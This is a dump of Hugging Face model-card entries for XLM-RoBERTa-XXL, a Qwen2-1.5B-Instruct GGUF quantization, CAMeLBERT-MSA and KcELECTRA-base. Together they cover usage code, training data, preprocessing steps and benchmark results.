model = AutoModelForMaskedLM.from_pretrained("facebook/xlm-roberta-xxl")
# prepare input
text = "Replace me by any text you'd like."
encoded_input = tokenizer(text, return_tensors='pt')
# forward pass
output = model(**encoded_input)
```
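Since the card notes the model is mainly intended to be fine-tuned on downstream tasks such as sequence classification, here is a minimal, hypothetical fine-tuning sketch using the `Trainer` API; the dataset, label count, and training arguments are placeholder assumptions, and a model of this size typically needs multi-GPU or parameter-efficient setups in practice.
```python
# Hypothetical sequence-classification fine-tuning sketch; dataset and hyperparameters are placeholders.
from datasets import load_dataset
from transformers import (
    AutoModelForSequenceClassification,
    AutoTokenizer,
    Trainer,
    TrainingArguments,
)

tokenizer = AutoTokenizer.from_pretrained("facebook/xlm-roberta-xxl")
model = AutoModelForSequenceClassification.from_pretrained("facebook/xlm-roberta-xxl", num_labels=3)

dataset = load_dataset("xnli", "en")  # example dataset choice (3 labels), not from the card

def tokenize(batch):
    return tokenizer(
        batch["premise"], batch["hypothesis"],
        truncation=True, padding="max_length", max_length=128,
    )

encoded = dataset.map(tokenize, batched=True)

args = TrainingArguments(output_dir="xlmr-xxl-finetuned", per_device_train_batch_size=1, num_train_epochs=1)
trainer = Trainer(model=model, args=args, train_dataset=encoded["train"], eval_dataset=encoded["validation"])
trainer.train()
```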
### BibTeX entry and citation info
```bibtex
@article{DBLP:journals/corr/abs-2105-00572,
author = {Naman Goyal and
Jingfei Du and
Myle Ott and
Giri Anantharaman and
Alexis Conneau},
title = {Larger-Scale Transformers for Multilingual Masked Language Modeling},
journal = {CoRR},
volume = {abs/2105.00572},
year = {2021},
url = {https://arxiv.org/abs/2105.00572},
eprinttype = {arXiv},
eprint = {2105.00572},
timestamp = {Wed, 12 May 2021 15:54:31 +0200},
biburl = {https://dblp.org/rec/journals/corr/abs-2105-00572.bib},
bibsource = {dblp computer science bibliography, https://dblp.org}
}
``` |
RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf | RichardErkhov | "2024-06-22T18:08:34Z" | 3,663 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-22T17:53:39Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Qwen2-1.5B-Instruct - GGUF
- Model creator: https://huggingface.co/Qwen/
- Original model: https://huggingface.co/Qwen/Qwen2-1.5B-Instruct/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Qwen2-1.5B-Instruct.Q2_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q2_K.gguf) | Q2_K | 0.63GB |
| [Qwen2-1.5B-Instruct.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ3_XS.gguf) | IQ3_XS | 0.68GB |
| [Qwen2-1.5B-Instruct.IQ3_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ3_S.gguf) | IQ3_S | 0.71GB |
| [Qwen2-1.5B-Instruct.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q3_K_S.gguf) | Q3_K_S | 0.71GB |
| [Qwen2-1.5B-Instruct.IQ3_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ3_M.gguf) | IQ3_M | 0.72GB |
| [Qwen2-1.5B-Instruct.Q3_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q3_K.gguf) | Q3_K | 0.77GB |
| [Qwen2-1.5B-Instruct.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q3_K_M.gguf) | Q3_K_M | 0.77GB |
| [Qwen2-1.5B-Instruct.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q3_K_L.gguf) | Q3_K_L | 0.82GB |
| [Qwen2-1.5B-Instruct.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ4_XS.gguf) | IQ4_XS | 0.84GB |
| [Qwen2-1.5B-Instruct.Q4_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_0.gguf) | Q4_0 | 0.87GB |
| [Qwen2-1.5B-Instruct.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ4_NL.gguf) | IQ4_NL | 0.88GB |
| [Qwen2-1.5B-Instruct.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_K_S.gguf) | Q4_K_S | 0.88GB |
| [Qwen2-1.5B-Instruct.Q4_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_K.gguf) | Q4_K | 0.92GB |
| [Qwen2-1.5B-Instruct.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_K_M.gguf) | Q4_K_M | 0.92GB |
| [Qwen2-1.5B-Instruct.Q4_1.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_1.gguf) | Q4_1 | 0.95GB |
| [Qwen2-1.5B-Instruct.Q5_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_0.gguf) | Q5_0 | 1.02GB |
| [Qwen2-1.5B-Instruct.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_K_S.gguf) | Q5_K_S | 1.02GB |
| [Qwen2-1.5B-Instruct.Q5_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_K.gguf) | Q5_K | 1.05GB |
| [Qwen2-1.5B-Instruct.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_K_M.gguf) | Q5_K_M | 1.05GB |
| [Qwen2-1.5B-Instruct.Q5_1.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_1.gguf) | Q5_1 | 1.1GB |
| [Qwen2-1.5B-Instruct.Q6_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q6_K.gguf) | Q6_K | 1.19GB |
| [Qwen2-1.5B-Instruct.Q8_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q8_0.gguf) | Q8_0 | 1.53GB |
Original model description:
---
license: apache-2.0
language:
- en
pipeline_tag: text-generation
tags:
- chat
---
# Qwen2-1.5B-Instruct
## Introduction
Qwen2 is the new series of Qwen large language models. For Qwen2, we release a number of base language models and instruction-tuned language models ranging from 0.5 to 72 billion parameters, including a Mixture-of-Experts model. This repo contains the instruction-tuned 1.5B Qwen2 model.
Compared with state-of-the-art open-source language models, including the previously released Qwen1.5, Qwen2 has generally surpassed most open-source models and demonstrated competitiveness against proprietary models across a series of benchmarks targeting language understanding, language generation, multilingual capability, coding, mathematics, reasoning, etc.
For more details, please refer to our [blog](https://qwenlm.github.io/blog/qwen2/), [GitHub](https://github.com/QwenLM/Qwen2), and [Documentation](https://qwen.readthedocs.io/en/latest/).
<br>
## Model Details
Qwen2 is a language model series including decoder language models of different model sizes. For each size, we release the base language model and the aligned chat model. It is based on the Transformer architecture with SwiGLU activation, attention QKV bias, group query attention, etc. Additionally, we have an improved tokenizer adaptive to multiple natural languages and codes.
## Training details
We pretrained the models with a large amount of data, and we post-trained the models with both supervised finetuning and direct preference optimization.
## Requirements
The code for Qwen2 has been merged into the latest Hugging Face Transformers, and we advise you to install `transformers>=4.37.0`; otherwise you might encounter the following error:
```
KeyError: 'qwen2'
```
## Quickstart
Below is a code snippet using `apply_chat_template` that shows how to load the tokenizer and model and how to generate content.
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
device = "cuda" # the device to load the model onto
model = AutoModelForCausalLM.from_pretrained(
"Qwen/Qwen2-1.5B-Instruct",
torch_dtype="auto",
device_map="auto"
)
tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-1.5B-Instruct")
prompt = "Give me a short introduction to large language model."
messages = [
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": prompt}
]
text = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
model_inputs = tokenizer([text], return_tensors="pt").to(device)
generated_ids = model.generate(
model_inputs.input_ids,
max_new_tokens=512
)
generated_ids = [
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
```
## Evaluation
We briefly compare Qwen2-1.5B-Instruct with Qwen1.5-1.8B-Chat. The results are as follows:
| Datasets | Qwen1.5-0.5B-Chat | **Qwen2-0.5B-Instruct** | Qwen1.5-1.8B-Chat | **Qwen2-1.5B-Instruct** |
| :--- | :---: | :---: | :---: | :---: |
| MMLU | 35.0 | **37.9** | 43.7 | **52.4** |
| HumanEval | 9.1 | **17.1** | 25.0 | **37.8** |
| GSM8K | 11.3 | **40.1** | 35.3 | **61.6** |
| C-Eval | 37.2 | **45.2** | 55.3 | **63.8** |
| IFEval (Prompt Strict-Acc.) | 14.6 | **20.0** | 16.8 | **29.0** |
## Citation
If you find our work helpful, feel free to give us a cite.
```
@article{qwen2,
title={Qwen2 Technical Report},
year={2024}
}
```
|
CAMeL-Lab/bert-base-arabic-camelbert-msa | CAMeL-Lab | "2021-09-14T14:33:41Z" | 3,661 | 9 | transformers | [
"transformers",
"pytorch",
"tf",
"jax",
"bert",
"fill-mask",
"ar",
"arxiv:2103.06678",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:04Z" | ---
language:
- ar
license: apache-2.0
widget:
- text: "الهدف من الحياة هو [MASK] ."
---
# CAMeLBERT: A collection of pre-trained models for Arabic NLP tasks
## Model description
**CAMeLBERT** is a collection of BERT models pre-trained on Arabic texts with different sizes and variants.
We release pre-trained language models for Modern Standard Arabic (MSA), dialectal Arabic (DA), and classical Arabic (CA), in addition to a model pre-trained on a mix of the three.
We also provide additional models that are pre-trained on a scaled-down set of the MSA variant (half, quarter, eighth, and sixteenth).
The details are described in the paper *"[The Interplay of Variant, Size, and Task Type in Arabic Pre-trained Language Models](https://arxiv.org/abs/2103.06678)."*
This model card describes **CAMeLBERT-MSA** (`bert-base-arabic-camelbert-msa`), a model pre-trained on the entire MSA dataset.
||Model|Variant|Size|#Word|
|-|-|:-:|-:|-:|
||`bert-base-arabic-camelbert-mix`|CA,DA,MSA|167GB|17.3B|
||`bert-base-arabic-camelbert-ca`|CA|6GB|847M|
||`bert-base-arabic-camelbert-da`|DA|54GB|5.8B|
|✔|`bert-base-arabic-camelbert-msa`|MSA|107GB|12.6B|
||`bert-base-arabic-camelbert-msa-half`|MSA|53GB|6.3B|
||`bert-base-arabic-camelbert-msa-quarter`|MSA|27GB|3.1B|
||`bert-base-arabic-camelbert-msa-eighth`|MSA|14GB|1.6B|
||`bert-base-arabic-camelbert-msa-sixteenth`|MSA|6GB|746M|
## Intended uses
You can use the released model for either masked language modeling or next sentence prediction.
However, it is mostly intended to be fine-tuned on an NLP task, such as NER, POS tagging, sentiment analysis, dialect identification, and poetry classification.
We release our fine-tuning code [here](https://github.com/CAMeL-Lab/CAMeLBERT).
#### How to use
You can use this model directly with a pipeline for masked language modeling:
```python
>>> from transformers import pipeline
>>> unmasker = pipeline('fill-mask', model='CAMeL-Lab/bert-base-arabic-camelbert-msa')
>>> unmasker("الهدف من الحياة هو [MASK] .")
[{'sequence': '[CLS] الهدف من الحياة هو العمل. [SEP]',
'score': 0.08507660031318665,
'token': 2854,
'token_str': 'العمل'},
{'sequence': '[CLS] الهدف من الحياة هو الحياة. [SEP]',
'score': 0.058905381709337234,
'token': 3696, 'token_str': 'الحياة'},
{'sequence': '[CLS] الهدف من الحياة هو النجاح. [SEP]',
'score': 0.04660581797361374, 'token': 6232,
'token_str': 'النجاح'},
{'sequence': '[CLS] الهدف من الحياة هو الربح. [SEP]',
'score': 0.04156001657247543,
'token': 12413, 'token_str': 'الربح'},
{'sequence': '[CLS] الهدف من الحياة هو الحب. [SEP]',
'score': 0.03534102067351341,
'token': 3088,
'token_str': 'الحب'}]
```
*Note*: to download our models, you would need `transformers>=3.5.0`. Otherwise, you could download the models manually.
Here is how to use this model to get the features of a given text in PyTorch:
```python
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-msa')
model = AutoModel.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-msa')
text = "مرحبا يا عالم."
encoded_input = tokenizer(text, return_tensors='pt')
output = model(**encoded_input)
```
and in TensorFlow:
```python
from transformers import AutoTokenizer, TFAutoModel
tokenizer = AutoTokenizer.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-msa')
model = TFAutoModel.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-msa')
text = "مرحبا يا عالم."
encoded_input = tokenizer(text, return_tensors='tf')
output = model(encoded_input)
```
## Training data
- MSA (Modern Standard Arabic)
- [The Arabic Gigaword Fifth Edition](https://catalog.ldc.upenn.edu/LDC2011T11)
- [Abu El-Khair Corpus](http://www.abuelkhair.net/index.php/en/arabic/abu-el-khair-corpus)
- [OSIAN corpus](https://vlo.clarin.eu/search;jsessionid=31066390B2C9E8C6304845BA79869AC1?1&q=osian)
- [Arabic Wikipedia](https://archive.org/details/arwiki-20190201)
- The unshuffled version of the Arabic [OSCAR corpus](https://oscar-corpus.com/)
## Training procedure
We use [the original implementation](https://github.com/google-research/bert) released by Google for pre-training.
We follow the original English BERT model's hyperparameters for pre-training, unless otherwise specified.
### Preprocessing
- After extracting the raw text from each corpus, we apply the following pre-processing.
- We first remove invalid characters and normalize white spaces using the utilities provided by [the original BERT implementation](https://github.com/google-research/bert/blob/eedf5716ce1268e56f0a50264a88cafad334ac61/tokenization.py#L286-L297).
- We also remove lines without any Arabic characters.
- We then remove diacritics and kashida using [CAMeL Tools](https://github.com/CAMeL-Lab/camel_tools).
- Finally, we split each line into sentences with a heuristics-based sentence segmenter.
- We train a WordPiece tokenizer on the entire dataset (167 GB text) with a vocabulary size of 30,000 using [HuggingFace's tokenizers](https://github.com/huggingface/tokenizers).
- We do not lowercase letters nor strip accents.
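A rough illustration of the diacritic and kashida removal step described above, assuming the `camel_tools` package is installed; the exact utilities used by the authors may differ.
```python
# Rough sketch of the dediacritization / kashida-removal step; assumes `pip install camel-tools`.
import re

from camel_tools.utils.dediac import dediac_ar

text = "الهدَفُ مِنَ الحيـــاة"
text = dediac_ar(text)             # strip Arabic diacritics
text = re.sub("\u0640", "", text)  # remove kashida (tatweel) characters
print(text)
```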
### Pre-training
- The model was trained on a single cloud TPU (`v3-8`) for one million steps in total.
- The first 90,000 steps were trained with a batch size of 1,024 and the rest was trained with a batch size of 256.
- The sequence length was limited to 128 tokens for 90% of the steps and 512 for the remaining 10%.
- We use whole word masking and a duplicate factor of 10.
- We set max predictions per sequence to 20 for the dataset with max sequence length of 128 tokens and 80 for the dataset with max sequence length of 512 tokens.
- We use a random seed of 12345, masked language model probability of 0.15, and short sequence probability of 0.1.
- The optimizer used is Adam with a learning rate of 1e-4, \\(\beta_{1} = 0.9\\) and \\(\beta_{2} = 0.999\\), a weight decay of 0.01, learning rate warmup for 10,000 steps and linear decay of the learning rate after.
## Evaluation results
- We evaluate our pre-trained language models on five NLP tasks: NER, POS tagging, sentiment analysis, dialect identification, and poetry classification.
- We fine-tune and evaluate the models using 12 datasets.
- We used Hugging Face's transformers to fine-tune our CAMeLBERT models.
- We used transformers `v3.1.0` along with PyTorch `v1.5.1`.
- The fine-tuning was done by adding a fully connected linear layer to the last hidden state.
- We use \\(F_{1}\\) score as a metric for all tasks.
- Code used for fine-tuning is available [here](https://github.com/CAMeL-Lab/CAMeLBERT).
### Results
| Task | Dataset | Variant | Mix | CA | DA | MSA | MSA-1/2 | MSA-1/4 | MSA-1/8 | MSA-1/16 |
| -------------------- | --------------- | ------- | ----- | ----- | ----- | ----- | ------- | ------- | ------- | -------- |
| NER | ANERcorp | MSA | 80.8% | 67.9% | 74.1% | 82.4% | 82.0% | 82.1% | 82.6% | 80.8% |
| POS | PATB (MSA) | MSA | 98.1% | 97.8% | 97.7% | 98.3% | 98.2% | 98.3% | 98.2% | 98.2% |
| | ARZTB (EGY) | DA | 93.6% | 92.3% | 92.7% | 93.6% | 93.6% | 93.7% | 93.6% | 93.6% |
| | Gumar (GLF) | DA | 97.3% | 97.7% | 97.9% | 97.9% | 97.9% | 97.9% | 97.9% | 97.9% |
| SA | ASTD | MSA | 76.3% | 69.4% | 74.6% | 76.9% | 76.0% | 76.8% | 76.7% | 75.3% |
| | ArSAS | MSA | 92.7% | 89.4% | 91.8% | 93.0% | 92.6% | 92.5% | 92.5% | 92.3% |
| | SemEval | MSA | 69.0% | 58.5% | 68.4% | 72.1% | 70.7% | 72.8% | 71.6% | 71.2% |
| DID | MADAR-26 | DA | 62.9% | 61.9% | 61.8% | 62.6% | 62.0% | 62.8% | 62.0% | 62.2% |
| | MADAR-6 | DA | 92.5% | 91.5% | 92.2% | 91.9% | 91.8% | 92.2% | 92.1% | 92.0% |
| | MADAR-Twitter-5 | MSA | 75.7% | 71.4% | 74.2% | 77.6% | 78.5% | 77.3% | 77.7% | 76.2% |
| | NADI | DA | 24.7% | 17.3% | 20.1% | 24.9% | 24.6% | 24.6% | 24.9% | 23.8% |
| Poetry | APCD | CA | 79.8% | 80.9% | 79.6% | 79.7% | 79.9% | 80.0% | 79.7% | 79.8% |
### Results (Average)
| | Variant | Mix | CA | DA | MSA | MSA-1/2 | MSA-1/4 | MSA-1/8 | MSA-1/16 |
| -------------------- | ------- | ----- | ----- | ----- | ----- | ------- | ------- | ------- | -------- |
| Variant-wise-average<sup>[[1]](#footnote-1)</sup> | MSA | 82.1% | 75.7% | 80.1% | 83.4% | 83.0% | 83.3% | 83.2% | 82.3% |
| | DA | 74.4% | 72.1% | 72.9% | 74.2% | 74.0% | 74.3% | 74.1% | 73.9% |
| | CA | 79.8% | 80.9% | 79.6% | 79.7% | 79.9% | 80.0% | 79.7% | 79.8% |
| Macro-Average | ALL | 78.7% | 74.7% | 77.1% | 79.2% | 79.0% | 79.2% | 79.1% | 78.6% |
<a name="footnote-1">[1]</a>: Variant-wise-average refers to average over a group of tasks in the same language variant.
## Acknowledgements
This research was supported with Cloud TPUs from Google’s TensorFlow Research Cloud (TFRC).
## Citation
```bibtex
@inproceedings{inoue-etal-2021-interplay,
title = "The Interplay of Variant, Size, and Task Type in {A}rabic Pre-trained Language Models",
author = "Inoue, Go and
Alhafni, Bashar and
Baimukan, Nurpeiis and
Bouamor, Houda and
Habash, Nizar",
booktitle = "Proceedings of the Sixth Arabic Natural Language Processing Workshop",
month = apr,
year = "2021",
address = "Kyiv, Ukraine (Online)",
publisher = "Association for Computational Linguistics",
abstract = "In this paper, we explore the effects of language variants, data sizes, and fine-tuning task types in Arabic pre-trained language models. To do so, we build three pre-trained language models across three variants of Arabic: Modern Standard Arabic (MSA), dialectal Arabic, and classical Arabic, in addition to a fourth language model which is pre-trained on a mix of the three. We also examine the importance of pre-training data size by building additional models that are pre-trained on a scaled-down set of the MSA variant. We compare our different models to each other, as well as to eight publicly available models by fine-tuning them on five NLP tasks spanning 12 datasets. Our results suggest that the variant proximity of pre-training data to fine-tuning data is more important than the pre-training data size. We exploit this insight in defining an optimized system selection model for the studied tasks.",
}
```
|
beomi/KcELECTRA-base | beomi | "2024-05-23T13:26:43Z" | 3,661 | 24 | transformers | [
"transformers",
"pytorch",
"safetensors",
"electra",
"pretraining",
"korean",
"ko",
"en",
"doi:10.57967/hf/0017",
"license:mit",
"endpoints_compatible",
"region:us"
] | null | "2022-03-02T23:29:05Z" | ---
language:
- ko
- en
tags:
- electra
- korean
license: "mit"
---
# KcELECTRA: Korean comments ELECTRA
** Updates on 2022.10.08 **
- The KcELECTRA-base-v2022 (formerly v2022-dev) model has been renamed --> it is now available as the `v2022` revision of the KcELECTRA-base repo.
- Detailed scores for that model have been added.
- Compared to the previous KcELECTRA-base (v2021), it improves performance by roughly 1%p on most downstream tasks.
---
Most publicly released Korean Transformer-family models are trained on well-curated data such as Korean Wikipedia, news articles, and books. In contrast, user-generated noisy text datasets such as NSMC are not curated: they are colloquial, full of neologisms, and frequently contain typos and other expressions that rarely appear in formal writing.
KcELECTRA is a pretrained ELECTRA model whose tokenizer and model were trained from scratch on comments and replies collected from Naver News, precisely to handle datasets with these characteristics.
Compared to the earlier KcBERT, performance improves substantially thanks to a larger dataset and an expanded vocabulary.
KcELECTRA can be loaded directly through Hugging Face's Transformers library (no separate file download is required).
```
💡 NOTE 💡
KoELECTRA, which is trained on a general corpus, is likely to perform better on general-purpose tasks.
KcBERT/KcELECTRA are PLMs that work better on user-generated, noisy text.
```
## KcELECTRA Performance
- The finetuning code can be found at https://github.com/Beomi/KcBERT-finetune
- Detailed per-step scores are available in each checkpoint folder of that repo.
| | Size<br/>(용량) | **NSMC**<br/>(acc) | **Naver NER**<br/>(F1) | **PAWS**<br/>(acc) | **KorNLI**<br/>(acc) | **KorSTS**<br/>(spearman) | **Question Pair**<br/>(acc) | **KorQuaD (Dev)**<br/>(EM/F1) |
| :----------------- | :-------------: | :----------------: | :--------------------: | :----------------: | :------------------: | :-----------------------: | :-------------------------: | :---------------------------: |
| **KcELECTRA-base-v2022** | 475M | **91.97** | 87.35 | 76.50 | 82.12 | 83.67 | 95.12 | 69.00 / 90.40 |
| **KcELECTRA-base** | 475M | 91.71 | 86.90 | 74.80 | 81.65 | 82.65 | **95.78** | 70.60 / 90.11 |
| KcBERT-Base | 417M | 89.62 | 84.34 | 66.95 | 74.85 | 75.57 | 93.93 | 60.25 / 84.39 |
| KcBERT-Large | 1.2G | 90.68 | 85.53 | 70.15 | 76.99 | 77.49 | 94.06 | 62.16 / 86.64 |
| KoBERT | 351M | 89.63 | 86.11 | 80.65 | 79.00 | 79.64 | 93.93 | 52.81 / 80.27 |
| XLM-Roberta-Base | 1.03G | 89.49 | 86.26 | 82.95 | 79.92 | 79.09 | 93.53 | 64.70 / 88.94 |
| HanBERT | 614M | 90.16 | 87.31 | 82.40 | 80.89 | 83.33 | 94.19 | 78.74 / 92.02 |
| KoELECTRA-Base | 423M | 90.21 | 86.87 | 81.90 | 80.85 | 83.21 | 94.20 | 61.10 / 89.59 |
| KoELECTRA-Base-v2 | 423M | 89.70 | 87.02 | 83.90 | 80.61 | 84.30 | 94.72 | 84.34 / 92.58 |
| KoELECTRA-Base-v3 | 423M | 90.63 | **88.11** | **84.45** | **82.24** | **85.53** | 95.25 | **84.83 / 93.45** |
| DistilKoBERT | 108M | 88.41 | 84.13 | 62.55 | 70.55 | 73.21 | 92.48 | 54.12 / 77.80 |
\*HanBERT's size is the combined size of the BERT model and the tokenizer DB.
\***These results were obtained with the config settings as-is; additional hyperparameter tuning may yield better performance.**
## How to use
### Requirements
- `pytorch ~= 1.8.0`
- `transformers ~= 4.11.3`
- `emoji ~= 0.6.0`
- `soynlp ~= 0.0.493`
### Default usage
```python
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained("beomi/KcELECTRA-base")
model = AutoModel.from_pretrained("beomi/KcELECTRA-base")
```
> 💡 If your existing KcBERT-related code uses `AutoTokenizer` and `AutoModel`, simply changing `.from_pretrained("beomi/kcbert-base")` to `.from_pretrained("beomi/KcELECTRA-base")` is all that is needed.
### Pretrain & Finetune Colab links
#### Pretrain Data
- The data used to train KcBERT, plus comments collected up to early March 2021
- About 17GB
- Documents are built from grouped comment-reply threads
#### Pretrain Code
- Pretraining was done with the https://github.com/KLUE-benchmark/KLUE-ELECTRA repo
#### Finetune Code
- Finetuning and score comparison were done with the https://github.com/Beomi/KcBERT-finetune repo
#### Finetune Samples
- NSMC with PyTorch-Lightning 1.3.0, GPU, Colab <a href="https://colab.research.google.com/drive/1Hh63kIBAiBw3Hho--BvfdUWLu-ysMFF0?usp=sharing">
<img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/>
</a>
## Train Data & Preprocessing
### Raw Data
The training data consists of all **comments and replies** collected from **news articles with many comments, or from all news articles,** published between 2019.01.01 and 2021.03.09.
With text only extracted, the data is **about 17.3GB and contains more than 180 million sentences**.
> KcBERT was trained on text from 2019.01-2020.06, about 90 million sentences after cleaning.
### Preprocessing
The preprocessing steps applied for PLM training are as follows.
1. Korean, English, special characters, and even emoji (🥳)!
Using regular expressions, Korean, English, and special characters, as well as emoji, were kept in the training data.
The Korean character range was set to `ㄱ-ㅎ가-힣`, which excludes the Hanja within `ㄱ-힣`.
2. Collapsing repeated characters within comments
Repeated characters such as `ㅋㅋㅋㅋㅋ` were collapsed into forms like `ㅋㅋ`.
3. Cased Model
KcBERT is a cased model that preserves upper/lower case for English text.
4. Removing texts of 10 characters or fewer
Texts of fewer than 10 characters were excluded, since they usually consist of a single word.
5. Deduplication
To remove duplicated comments, exactly identical duplicates were merged into one.
6. Removing `OOO`
In Naver comments, profanity is masked as `OOO` by the built-in filter. These markers were replaced with whitespace.
Install the packages below with pip and clean your text with the `clean` function below; this improves downstream-task performance (fewer `[UNK]` tokens).
```bash
pip install soynlp emoji
```
Apply the `clean` function below to your text data.
```python
import re
import emoji
from soynlp.normalizer import repeat_normalize
pattern = re.compile(f'[^ .,?!/@$%~%·∼()\x00-\x7Fㄱ-ㅣ가-힣]+')
url_pattern = re.compile(
r'https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)')
def clean(x):
    x = pattern.sub(' ', x)
    x = emoji.replace_emoji(x, replace='')  # remove emoji
    x = url_pattern.sub('', x)
    x = x.strip()
    x = repeat_normalize(x, num_repeats=2)
    return x
```
> 💡 The `clean` function above was not applied when computing the finetune scores.
### Cleaned Data
- Additional data beyond the KcBERT corpus will be released after cleanup.
## Tokenizer, Model Train
The tokenizer was trained with Hugging Face's [Tokenizers](https://github.com/huggingface/tokenizers) library.
Specifically, `BertWordPieceTokenizer` was used, with a vocab size of `30000`.
The tokenizer was trained on the full dataset; to better cover general downstream tasks, the non-overlapping part of the vocab used by KoELECTRA was added. (In practice, the two models' vocabularies overlapped by about 5,000 tokens.)
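As a rough sketch of this step (the corpus file and casing options below are assumptions, not the authors' exact script), training a WordPiece tokenizer with the Tokenizers library looks roughly like this:
```python
# Rough sketch of WordPiece tokenizer training with Hugging Face Tokenizers;
# the corpus file and casing options are assumptions, not the authors' exact settings.
from tokenizers import BertWordPieceTokenizer

tokenizer = BertWordPieceTokenizer(lowercase=False, strip_accents=False)
tokenizer.train(files=["comments.txt"], vocab_size=30000)  # hypothetical corpus file
tokenizer.save_model(".")  # writes vocab.txt
```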
Training ran for about 10 days on a TPU `v3-8`; the model weights currently released on Hugging Face correspond to 848k training steps.
(Performance was evaluated with checkpoints taken every 100k steps; see the `KcBERT-finetune` repo for details.)
The training loss drops sharply during the first 100-200k steps and then keeps decreasing steadily until the end of training.

### Downstream-task performance of KcELECTRA by pretraining step
> 💡 The table below reports results for only a subset of checkpoints, not all of them.

- As shown above, KcELECTRA-base outperforms KcBERT-base and KcBERT-large **on every dataset**.
- KcELECTRA pretraining also shows gradual performance improvement as the number of training steps increases.
## Citation
When citing KcELECTRA, please use the following format.
```
@misc{lee2021kcelectra,
author = {Junbum Lee},
title = {KcELECTRA: Korean comments ELECTRA},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/Beomi/KcELECTRA}}
}
```
For uses other than citation in a paper, please include the MIT license notice. ☺️
## Acknowledgement
The GCP/TPU environment used to train the KcELECTRA model was supported by the [TFRC](https://www.tensorflow.org/tfrc?hl=ko) program.
Many thanks to [Monologg](https://github.com/monologg/) for the helpful advice during model training :)
## Reference
### Github Repos
- [KcBERT by Beomi](https://github.com/Beomi/KcBERT)
- [BERT by Google](https://github.com/google-research/bert)
- [KoBERT by SKT](https://github.com/SKTBrain/KoBERT)
- [KoELECTRA by Monologg](https://github.com/monologg/KoELECTRA/)
- [Transformers by Huggingface](https://github.com/huggingface/transformers)
- [Tokenizers by Hugginface](https://github.com/huggingface/tokenizers)
